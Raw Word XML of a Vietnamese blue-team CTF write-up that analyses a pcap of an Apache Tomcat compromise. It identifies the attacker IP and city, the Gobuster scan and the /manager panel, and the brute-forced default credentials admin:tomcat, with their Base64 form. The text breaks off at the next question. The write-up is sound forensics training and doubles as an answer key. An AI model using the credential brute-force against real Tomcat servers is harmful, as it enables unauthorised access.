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25FAD" w14:textId="2FB98210" w:rsidR="0075005D" w:rsidRPr="00A32928" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidR="00030621" w:rsidRPr="00A32928">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="4472C4" w:themeColor="accent1"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://cyberdefenders.org/blueteam-ctf-challenges/tomcat-takeover/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4D865E17" w14:textId="73F2B11C" w:rsidR="00030621" w:rsidRDefault="00030621" w:rsidP="00030621">
      <w:pPr>
        <w:pStyle w:val="qst-text"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Q1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00030621">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">IP nguồn thực hiện </w:t>
      </w:r>
      <w:r w:rsidR="00EE056E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tấn công</w:t>
      </w:r>
      <w:r w:rsidRPr="00030621">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> này trên máy chủ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> là</w:t>
      </w:r>
      <w:r w:rsidR="00EE056E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 14.0.0.120, gửi nhiều packet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E7BD7D" w14:textId="4602BBE0" w:rsidR="00030621" w:rsidRDefault="00EE056E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE056E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71EE5B1C" wp14:editId="40AF02CF">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2005"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4517CB" w14:textId="00C6CD30" w:rsidR="00030621" w:rsidRPr="00030621" w:rsidRDefault="00030621" w:rsidP="00030621">
      <w:pPr>
        <w:pStyle w:val="qst-text"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Q2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00030621">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Dựa trên địa chỉ IP được xác định liên quan đến kẻ tấn công, thành phố mà hoạt động của kẻ tấn công </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">được xác định là </w:t>
      </w:r>
      <w:r w:rsidR="00EE056E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>thành phố Quảng Châu (</w:t>
      </w:r>
      <w:r w:rsidR="00EE056E" w:rsidRPr="00EE056E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>https://search.arin.net/rdap/?query=14.0.0.120</w:t>
      </w:r>
      <w:r w:rsidR="00EE056E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FD374B" w14:textId="6DAE7962" w:rsidR="00030621" w:rsidRDefault="00EE056E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE056E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59738D0D" wp14:editId="513AAD50">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2005"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BD8008" w14:textId="77777777" w:rsidR="00C03900" w:rsidRDefault="00C03900" w:rsidP="00030621">
      <w:pPr>
        <w:pStyle w:val="qst-text"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FA08C3A" w14:textId="77777777" w:rsidR="00C03900" w:rsidRDefault="00C03900" w:rsidP="00030621">
      <w:pPr>
        <w:pStyle w:val="qst-text"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7433B276" w14:textId="77777777" w:rsidR="00C03900" w:rsidRDefault="00C03900" w:rsidP="00030621">
      <w:pPr>
        <w:pStyle w:val="qst-text"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AD734A9" w14:textId="01130BF9" w:rsidR="00030621" w:rsidRDefault="00030621" w:rsidP="00030621">
      <w:pPr>
        <w:pStyle w:val="qst-text"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Q3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00030621">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Từ phân tích pcap, nhiều cổng mở đã được phát hiện do quá trình quét hoạt động của kẻ tấn công. Cổng </w:t>
      </w:r>
      <w:r w:rsidR="006103FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>8080</w:t>
      </w:r>
      <w:r w:rsidRPr="00030621">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> cung cấp quyền truy cập vào bảng quản trị máy chủ web</w:t>
      </w:r>
      <w:r w:rsidR="00584938">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (HTTP)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014568FE" w14:textId="36F39462" w:rsidR="00030621" w:rsidRDefault="00611D42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00611D42">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39903337" wp14:editId="1D086BAD">
            <wp:extent cx="5943600" cy="334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005"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="66228614" w14:textId="4639313C" w:rsidR="00030621" w:rsidRDefault="00030621" w:rsidP="00030621">
      <w:pPr>
        <w:pStyle w:val="qst-text"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Q4. </w:t>
      </w:r>
      <w:r w:rsidRPr="00030621">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Sau khi phát hiện ra các cổng mở trên máy chủ của chúng tôi, có vẻ như kẻ tấn công đã cố gắng liệt kê và phát hiện các thư mục cũng như tệp trên máy chủ web của chúng tôi. </w:t>
      </w:r>
      <w:r w:rsidR="00611D42">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00030621">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ông cụ </w:t>
      </w:r>
      <w:r w:rsidR="00611D42">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Gobuster</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00030621">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>từ quá trình phân tích đã hỗ trợ kẻ tấn công</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA195BC" w14:textId="7C9F64E7" w:rsidR="00030621" w:rsidRDefault="00C03900">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03900">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09EEF220" wp14:editId="1E7EC336">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pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CB6953" w14:textId="77777777" w:rsidR="00C03900" w:rsidRDefault="00C03900" w:rsidP="00030621">
      <w:pPr>
        <w:pStyle w:val="qst-text"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A877992" w14:textId="77777777" w:rsidR="00C03900" w:rsidRDefault="00C03900" w:rsidP="00030621">
      <w:pPr>
        <w:pStyle w:val="qst-text"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F5DA4B5" w14:textId="597B54FD" w:rsidR="00030621" w:rsidRPr="00030621" w:rsidRDefault="00030621" w:rsidP="00030621">
      <w:pPr>
        <w:pStyle w:val="qst-text"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Q5. </w:t>
      </w:r>
      <w:r w:rsidRPr="00030621">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Sau nỗ lực liệt kê các thư mục trên máy chủ web</w:t>
      </w:r>
      <w:r w:rsidR="00465490">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00030621">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">kẻ tấn công đã thực hiện nhiều yêu cầu nhằm cố gắng xác định các giao diện quản trị. Kẻ tấn công có thể phát hiện ra thư mục </w:t>
      </w:r>
      <w:r w:rsidR="00C03900">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/manager</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00030621">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>được liên kết với bảng quản trị</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A84B95" w14:textId="479C25E6" w:rsidR="00030621" w:rsidRDefault="00C03900">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03900">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C66B8A7" wp14:editId="71E2482F">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p>
    <w:p w14:paraId="087A8313" w14:textId="10C633A4" w:rsidR="00030621" w:rsidRPr="00030621" w:rsidRDefault="00030621" w:rsidP="006D0D08">
      <w:pPr>
        <w:pStyle w:val="qst-text"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00030621">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Q6. Khi truy cập vào</w:t>
      </w:r>
      <w:r w:rsidR="009215D3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> thư mục /manager liên kết</w:t>
      </w:r>
      <w:r w:rsidRPr="00030621">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> bảng quản trị, kẻ tấn công đã cố gắng </w:t>
      </w:r>
      <w:r w:rsidR="00C03900">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>brute-force</w:t>
      </w:r>
      <w:r w:rsidRPr="00030621">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> thông tin đăng nhập. Từ dữ liệu,</w:t>
      </w:r>
      <w:r w:rsidR="009215D3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> danh sách</w:t>
      </w:r>
      <w:r w:rsidR="006D0D08">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00030621">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tên người dùng và mật khẩu chính xác mà kẻ tấn công đã sử dụng</w:t>
      </w:r>
      <w:r w:rsidR="009215D3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00030621">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009215D3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">để thử các trường hợp đăng nhập </w:t>
      </w:r>
      <w:r w:rsidRPr="00030621">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">thành công </w:t>
      </w:r>
      <w:r w:rsidR="009215D3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nhằm</w:t>
      </w:r>
      <w:r w:rsidR="006D0D08">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> authorize và</w:t>
      </w:r>
      <w:r w:rsidRPr="00030621">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>leo</w:t>
      </w:r>
      <w:r w:rsidRPr="00030621">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> quyền</w:t>
      </w:r>
      <w:r w:rsidR="00D9411B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> là </w:t>
      </w:r>
      <w:r w:rsidR="006D0D08">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">admin:tomcat, đã được mã hóa Base64 </w:t>
      </w:r>
      <w:r w:rsidR="00817903">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">thành </w:t>
      </w:r>
      <w:r w:rsidR="006D0D08" w:rsidRPr="006D0D08">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>YWRtaW46dG9tY2F0</w:t>
      </w:r>
      <w:r w:rsidR="006D0D08">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. Với trường hợp brute-force admin:tomcat đúng, server trả về HTTP</w:t>
      </w:r>
      <w:r w:rsidR="009215D3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/1.1</w:t>
      </w:r>
      <w:r w:rsidR="006D0D08">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 200 OK.</w:t>
      </w:r>
      <w:r w:rsidR="006D0D08">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00C03900">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Unauthorized (text/html)</w:t>
      </w:r>
      <w:r w:rsidR="00510699">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> là dấu hiệu cho thấy brute-force.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453DF5DD" w14:textId="257756C0" w:rsidR="006D0D08" w:rsidRDefault="009215D3" w:rsidP="00030621">
      <w:pPr>
        <w:pStyle w:val="qst-text"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22E56714" wp14:editId="52BF045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28E6425" w14:textId="77777777" w:rsidR="006D0D08" w:rsidRDefault="006D0D08" w:rsidP="00030621">
      <w:pPr>
        <w:pStyle w:val="qst-text"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DCDA571" w14:textId="3B904EA5" w:rsidR="00030621" w:rsidRPr="00030621" w:rsidRDefault="00030621" w:rsidP="00030621">
      <w:pPr>
        <w:pStyle w:val="qst-text"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
